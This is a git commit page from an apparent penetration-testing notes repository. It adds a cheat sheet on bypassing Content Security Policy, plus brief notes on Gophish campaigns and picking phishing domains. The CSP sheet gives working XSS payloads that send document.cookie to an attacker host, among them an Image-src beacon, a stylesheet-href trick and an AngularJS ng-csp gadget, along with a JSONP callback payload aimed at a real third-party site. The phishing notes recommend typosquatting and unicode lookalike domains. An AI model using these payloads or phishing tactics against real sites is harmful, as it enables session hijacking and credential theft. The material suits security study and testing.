whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

bump

This commit is contained in:
Stefan Friese 2021-11-12 00:48:54 +01:00
parent 9b31906c44
commit c328c604dd
5 changed files with 73 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
.gitmodules vendored
View File

@ -67,3 +67,6 @@
[submodule "forensics/volatility"] [submodule "forensics/volatility"]
path = forensics/volatility path = forensics/volatility
url = https://github.com/volatilityfoundation/volatility.git url = https://github.com/volatilityfoundation/volatility.git
[submodule "exploit/web/content_security_policy/JSONBee"]
path = exploit/web/content_security_policy/JSONBee
url = https://github.com/zigoo0/JSONBee.git

1
exploit/web/content_security_policy/JSONBee Submodule

@ -0,0 +1 @@
Subproject commit 1a518ddf695ae3093ff637c5958802715e890d88

52
exploit/web/content_security_policy/content_security_policy.md Normal file
View File

@ -0,0 +1,52 @@
# Content Security Policy (CSP)
* Either in HTTP header or inside DOM's HTML
* [CSP directives](https://content-security-policy.com/#directive)
* [CSP evaluator](https://csp-evaluator.withgoogle.com/)
* [Bypassing csp](https://blog.0daylabs.com/2016/09/09/bypassing-csp/)
## Sources
* `*` wildcard
* `none`
* `self` for sources delivered through the same protocol
* `default-src 'self';` may not load any script
* `unsafe-inline`
* `unsafe-eval`
* `test.com` loads resources from domain but not subdomains
* `*.test.com` loads resources from subdomains
* `data:<content-type>...` critical usage
* `nonce` loads if nonce is correct. `sha256`, `sha384`, `sha512`
* [style hasher](https://report-uri.com/home/hash)
## Usage
### JSONP
Find JSONP endpoints through which to use custom callback functions
* [JSONBee](https://github.com/zigoo0/JSONBee)
```sh
"><script+src="https://bebezoo.1688.com/fragment/index.htm?callback=alert(1337)"></script>
```
### Misconfiguration
Insert payload into `src` attribute
### Exfiltration
* [Beeceptor](beeceptor.com)
* Local webserver
* `connect-src` while Ajax/XHR requests are enabled
* Disguising as an `image-src` or `media-src` source
```html
<script>(new Image()).src = `https://example.com/${encodeURIComponent(document.cookie)}`</script>
```
other payloads
```sh
<link id="csp" rel=stylesheet href="" /><script nonce="abcdef">document.getElementById("csp").href="http://<attacker-IP>:8000/" + document.cookie;</script>
```
*
```sh
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.3/prototype.min.js" integrity="sha512-C4LuwXQtQOF1iTRy3zwClYLsLgFLlG8nCV5dCxDjPcWsyFelQXzi3efHRjptsOzbHwwnXC3ZU+sWUh1gmxaTBA==" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.2/angular.min.js"></script>
<div ng-app ng-csp>
{{$on.curry.call().document.location='https://<attacker-IP>/' + $on.curry.call().document.cookie}}
</div>
```

12
osint/social_engineering/gophish.md Normal file
View File

@ -0,0 +1,12 @@
# Gophish
* [Repo](https://github.com/gophish/gophish.git)
## Usage
* Create
* Send profile
* Landing page
* Email templates
* User groups
* New Campaign

5
osint/social_engineering/phishing_domain.md Normal file
View File

@ -0,0 +1,5 @@
# Phishing Domains
* Use an old, unused domain.
* Typosquatting, register a similar domain.
* Use similar looking chars from unicode.